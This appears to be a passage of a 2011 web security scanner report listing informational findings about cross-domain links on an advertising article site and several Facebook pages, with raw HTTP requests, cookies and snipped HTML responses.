<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/account-f39xvQ.css"/>

       <link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/ieHacks-EJ3dvQ.css"/>

       <script type="text/javascript">
...[SNIP]...
</script>

       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>

       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/simple-login-XGxhHA.js"></script>
...[SNIP]...
<noscript><img src="http://vs.dmtracker.com/images/zig.gif?Log=1" alt="zig" /></noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
...[SNIP]...

17.244. http://www.everydaylifestyles.com/articles3.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.everydaylifestyles.com
Path:	/articles3.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.everydaylifestyles.com/articles3.php?t202id=63559&t202kw=mn_3ba

The response contains the following links to other domains:

http://ads.bluelithium.com/pixel?id=708632&t=2
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=50087_NDM_cs=40&betq=11231=420540
http://trkzilla.com/tracking202/redirect/dl.php?t202id=94037&t202kw=els_stl_1
http://redcated/action/instaflex_hp
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1042058263/?label=9jEVCLvp6AEQl5jy8AM&guid=ON&script=0
http://www.trkzilla.com/tracking202/static/landing.php?lpip=9246

Request

GET /articles3.php?t202id=63559&t202kw=mn_3ba HTTP/1.1
Host: www.everydaylifestyles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:45:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.4
Connection: close
Content-Type: text/html
Content-Length: 11576

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Shocking Discovery for Joint Relief</title>
<meta name="description" content="Reviews a
...[SNIP]...
<img src="images/arrow.gif"> <a href="http://trkzilla.com/tracking202/redirect/dl.php?t202id=94037&t202kw=els_stl_1">Looking for auto insurance? Deals!</a>
...[SNIP]...


<img height="1" width="1" src="http://view.atdmt.com/action/instaflex_hp" />
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=50087_NDM_cs=40&betq=11231=420540" width="1" height="1" border="0" />
<img src="http://ads.bluelithium.com/pixel?id=708632&t=2" width="1" height="1" />

<script src="http://www.trkzilla.com/tracking202/static/landing.php?lpip=9246" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1042058263/?label=9jEVCLvp6AEQl5jy8AM&guid=ON&script=0"/>
</div>
...[SNIP]...

17.245. http://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fr.php%3Fpossible_fb_user%3D1%26app_id%3D0%26is_enabled%3D1%26next%26locale%3Den_US

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css
http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yK/r/RUlAZi5mpi3.css
http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js
http://c.static.ak.fbcdn.net/rsrc.php/yo/r/8Og39uOsjg5.css
http://e.static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico
http://f.static.ak.fbcdn.net/rsrc.php/yV/r/q477WKL4Jsu.css
http://f.static.ak.fbcdn.net/rsrc.php/yX/r/8v6XwwC31BN.css
http://f.static.ak.fbcdn.net/rsrc.php/yX/r/xDKZ0Z55ipf.css
http://static.ak.fbcdn.net/rsrc.php/y0/r/cDWS7NH0j-S.css
http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png

Request

GET /ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fr.php%3Fpossible_fb_user%3D1%26app_id%3D0%26is_enabled%3D1%26next%26locale%3Den_US HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-FB-Server: 10.53.34.75
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 04:08:15 GMT
Content-Length: 49873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yV/r/q477WKL4Jsu.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/y0/r/cDWS7NH0j-S.css" />
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yX/r/xDKZ0Z55ipf.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yo/r/8Og39uOsjg5.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yK/r/RUlAZi5mpi3.css" />
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yX/r/8v6XwwC31BN.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

17.246. http://www.facebook.com/careers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/careers/

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/careers/?ref=pf

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css
http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yK/r/RUlAZi5mpi3.css
http://b.static.ak.fbcdn.net/rsrc.php/yP/r/VLLIdFco_FS.png
http://b.static.ak.fbcdn.net/rsrc.php/yV/r/p2EQhKqozYb.png
http://b.static.ak.fbcdn.net/rsrc.php/yv/r/KDo2iiCy_gr.png
http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js
http://c.static.ak.fbcdn.net/rsrc.php/yo/r/8Og39uOsjg5.css
http://d.static.ak.fbcdn.net/rsrc.php/yj/r/7k4gu2SAeL1.jpg
http://d.static.ak.fbcdn.net/rsrc.php/yu/r/Zn2sdc4obqh.jpg
http://e.static.ak.fbcdn.net/rsrc.php/yJ/r/dNZ8lADSyV5.png
http://e.static.ak.fbcdn.net/rsrc.php/yX/r/BmRBrG86u58.png
http://e.static.ak.fbcdn.net/rsrc.php/yc/r/34irJImt1gS.css
http://e.static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico
http://e.static.ak.fbcdn.net/rsrc.php/yj/r/S2qnjiiSRro.css
http://e.static.ak.fbcdn.net/rsrc.php/ym/r/IQqCjk5NiJN.png
http://f.static.ak.fbcdn.net/rsrc.php/y8/r/rA11fLEN3pu.png
http://f.static.ak.fbcdn.net/rsrc.php/yM/r/8KSjR8nTFnM.png
http://f.static.ak.fbcdn.net/rsrc.php/yX/r/8v6XwwC31BN.css
http://f.static.ak.fbcdn.net/rsrc.php/yX/r/xDKZ0Z55ipf.css
http://f.static.ak.fbcdn.net/rsrc.php/yr/r/N5R94dW584a.png
http://static.ak.fbcdn.net/rsrc.php/y0/r/cDWS7NH0j-S.css
http://static.ak.fbcdn.net/rsrc.php/yL/r/ggZU8-xDRYP.css
http://static.ak.fbcdn.net/rsrc.php/yV/r/64Qw6hJnpsg.png
http://static.ak.fbcdn.net/rsrc.php/yj/r/OlBs86PzVAS.png
http://static.ak.fbcdn.net/rsrc.php/yj/r/h_raeRCe0vp.png
http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/yv/r/MoxBq-TLXDr.jpg

Request

GET /careers/?ref=pf HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 04:13:13 GMT
Content-Length: 21014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yL/r/ggZU8-xDRYP.css" />
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yX/r/xDKZ0Z55ipf.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/y0/r/cDWS7NH0j-S.css" />
<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/yj/r/S2qnjiiSRro.css" />
<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/yc/r/34irJImt1gS.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yo/r/8Og39uOsjg5.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yK/r/RUlAZi5mpi3.css" />
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yX/r/8v6XwwC31BN.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<div id="home_welcome"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/yv/r/MoxBq-TLXDr.jpg" /><div class="home_header_description">
...[SNIP]...
<a href="/careers/department.php?dept=engineering"><img src="http://f.static.ak.fbcdn.net/rsrc.php/yM/r/8KSjR8nTFnM.png" class="careers_dept_img" title="Software Engineering" alt="Software Engineering" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=legal"><img src="http://e.static.ak.fbcdn.net/rsrc.php/ym/r/IQqCjk5NiJN.png" class="careers_dept_img" title="Legal, Finance, Facilities & Admin" alt="Legal, Finance, Facilities & Admin" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=communications"><img src="http://static.ak.fbcdn.net/rsrc.php/yV/r/64Qw6hJnpsg.png" class="careers_dept_img" title="Communications & Public Policy" alt="Communications & Public Policy" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=product-management"><img src="http://e.static.ak.fbcdn.net/rsrc.php/yX/r/BmRBrG86u58.png" class="careers_dept_img" title="Product Management" alt="Product Management" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=IT"><img src="http://b.static.ak.fbcdn.net/rsrc.php/yv/r/KDo2iiCy_gr.png" class="careers_dept_img" title="IT & Security" alt="IT & Security" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=hr"><img src="http://e.static.ak.fbcdn.net/rsrc.php/yJ/r/dNZ8lADSyV5.png" class="careers_dept_img" title="HR & Recruiting" alt="HR & Recruiting" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=design"><img src="http://static.ak.fbcdn.net/rsrc.php/yj/r/OlBs86PzVAS.png" class="careers_dept_img" title="Design & User Experience" alt="Design & User Experience" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=tech-ops"><img src="http://b.static.ak.fbcdn.net/rsrc.php/yV/r/p2EQhKqozYb.png" class="careers_dept_img" title="Technical Operations" alt="Technical Operations" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=growth"><img src="http://b.static.ak.fbcdn.net/rsrc.php/yP/r/VLLIdFco_FS.png" class="careers_dept_img" title="Growth & Internationalization" alt="Growth & Internationalization" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=sales"><img src="http://f.static.ak.fbcdn.net/rsrc.php/y8/r/rA11fLEN3pu.png" class="careers_dept_img" title="Sales & Business Development" alt="Sales & Business Development" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=online-ops"><img src="http://static.ak.fbcdn.net/rsrc.php/yj/r/h_raeRCe0vp.png" class="careers_dept_img" title="Online Operations" alt="Online Operations" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=platform"><img src="http://f.static.ak.fbcdn.net/rsrc.php/yr/r/N5R94dW584a.png" class="careers_dept_img" title="Platform & Product Marketing" alt="Platform & Product Marketing" /></a>
...[SNIP]...
<div class="UIImageBlock clearfix mtm"><img class="mrl UIImageBlock_Image UIImageBlock_MED_Image img" src="http://d.static.ak.fbcdn.net/rsrc.php/yu/r/Zn2sdc4obqh.jpg" alt="food" width="138" height="88" /><div class="UIImageBlock_Content UIImageBlock_MED_Content">
...[SNIP]...
<div class="UIImageBlock clearfix mtm"><img class="mrl UIImageBlock_Image UIImageBlock_MED_Image img" src="http://d.static.ak.fbcdn.net/rsrc.php/yj/r/7k4gu2SAeL1.jpg" alt="life" width="138" height="88" /><div class="UIImageBlock_Content UIImageBlock_MED_Content">
...[SNIP]...

17.247. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/help/?ref=pf

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/y1/r/pbxjnMn0GmU.gif
http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css
http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yK/r/RUlAZi5mpi3.css
http://b.static.ak.fbcdn.net/rsrc.php/yw/r/obVmlvXVyjY.css
http://c.static.ak.fbcdn.net/rsrc.php/y0/r/OtRXPAfGtIS.css
http://c.static.ak.fbcdn.net/rsrc.php/y9/r/l-DFeCZ-vnm.css
http://c.static.ak.fbcdn.net/rsrc.php/yf/r/5lDtlA3LiNH.css
http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js
http://c.static.ak.fbcdn.net/rsrc.php/yo/r/8Og39uOsjg5.css
http://e.static.ak.fbcdn.net/rsrc.php/yL/r/T7vhxAeDIW_.css
http://e.static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico
http://e.static.ak.fbcdn.net/rsrc.php/yn/r/WmhMkiNRFnS.css
http://e.static.ak.fbcdn.net/rsrc.php/yz/r/cm18ccrbPq2.css
http://f.static.ak.fbcdn.net/rsrc.php/yX/r/8v6XwwC31BN.css
http://f.static.ak.fbcdn.net/rsrc.php/yX/r/xDKZ0Z55ipf.css
http://static.ak.fbcdn.net/rsrc.php/y0/r/cDWS7NH0j-S.css
http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png
http://zynga.com/support

Request

GET /help/?ref=pf HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

17.248. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/activity.php?api_key=63203377906&font=arial&height=300&locale=en_US&recommendations=false&sdk=joey&site=http%3A%2F%2Fwww.ehow.com%2F&width=300

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yV/r/48SBskNJuXC.css
http://b.static.ak.fbcdn.net/rsrc.php/yp/r/mFutiZvI9yq.css
http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif
http://static.ak.fbcdn.net/rsrc.php/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

17.249. http://www.facebook.com/plugins/facepile.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/facepile.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/facepile.php?api_key=63203377906&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df3b08ee3bc%26origin%3Dhttp%253A%252F%252Fwww.ehow.com%252Ff1c4f17d8%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&sdk=joey&width=200

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yV/r/48SBskNJuXC.css
http://b.static.ak.fbcdn.net/rsrc.php/yp/r/mFutiZvI9yq.css
http://static.ak.fbcdn.net/rsrc.php/yV/r/P0d2GjyO592.css
http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /plugins/facepile.php?api_key=63203377906&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df3b08ee3bc%26origin%3Dhttp%253A%252F%252Fwww.ehow.com%252Ff1c4f17d8%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&sdk=joey&width=200 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/account/simple_login.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dconstantcontact.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.constantcontact.com%252Findex.jsp%26extra_2%3DUS; lsd=ErPUD; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; datr=8CJHTYhjyotVYfKpZ5B35lnF; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=86x22

Response

17.250. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fdevelopers.facebook.com%2Fblog%2Fpost%2F377&force_resize=1&show_faces=0

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js
http://static.ak.fbcdn.net/rsrc.php/yt/r/CJLVmfhHQeD.css

Request

Response

17.251. http://www.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/r.php?possible_fb_user=1&app_id=0&is_enabled=1&next&locale=en_US

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css
http://b.static.ak.fbcdn.net/rsrc.php/yK/r/RUlAZi5mpi3.css
http://c.static.ak.fbcdn.net/rsrc.php/yL/r/u8Bue217GRs.css
http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js
http://c.static.ak.fbcdn.net/rsrc.php/yo/r/8Og39uOsjg5.css
http://d.static.ak.fbcdn.net/rsrc.php/yX/r/anpKH31XAkw.css
http://f.static.ak.fbcdn.net/rsrc.php/yC/r/kCZMBvrQW1e.css
http://f.static.ak.fbcdn.net/rsrc.php/yX/r/8v6XwwC31BN.css
http://f.static.ak.fbcdn.net/rsrc.php/yX/r/xDKZ0Z55ipf.css
http://f.static.ak.fbcdn.net/rsrc.php/yb/r/GsNJNwuI-UM.gif
http://static.ak.fbcdn.net/rsrc.php/y0/r/cDWS7NH0j-S.css
http://static.ak.fbcdn.net/rsrc.php/yp/r/dSZJ3-dc5Bt.css
http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png

Request

Response

17.252. http://www.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/r.php?possible_fb_user=1&app_id=0&is_enabled=1&next=&locale=en_US

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yC/r/kCZMBvrQW1e.css
http://b.static.ak.fbcdn.net/rsrc.php/yR/r/QHFJzL8pQxC.css
http://b.static.ak.fbcdn.net/rsrc.php/yT/r/D5o1hNWmdQM.css
http://b.static.ak.fbcdn.net/rsrc.php/yT/r/VI44PqgS-Cz.css
http://b.static.ak.fbcdn.net/rsrc.php/yV/r/48SBskNJuXC.css
http://b.static.ak.fbcdn.net/rsrc.php/yZ/r/UL9wdQvoF4k.css
http://b.static.ak.fbcdn.net/rsrc.php/yb/r/GsNJNwuI-UM.gif
http://b.static.ak.fbcdn.net/rsrc.php/yp/r/mFutiZvI9yq.css
http://b.static.ak.fbcdn.net/rsrc.php/ys/r/bVTRLwBVg3a.css
http://static.ak.fbcdn.net/rsrc.php/ya/r/sF_0-1qzmRi.css
http://static.ak.fbcdn.net/rsrc.php/yc/r/Ftdyj-UFsy1.css
http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js
http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Wed, 02 Feb 2011 16:27:24 GMT
Content-Length: 28174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yZ/r/UL9wdQvoF4k.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yT/r/D5o1hNWmdQM.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yV/r/48SBskNJuXC.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yC/r/kCZMBvrQW1e.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yp/r/mFutiZvI9yq.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yc/r/Ftdyj-UFsy1.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/ys/r/bVTRLwBVg3a.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yR/r/QHFJzL8pQxC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/ya/r/sF_0-1qzmRi.css" />
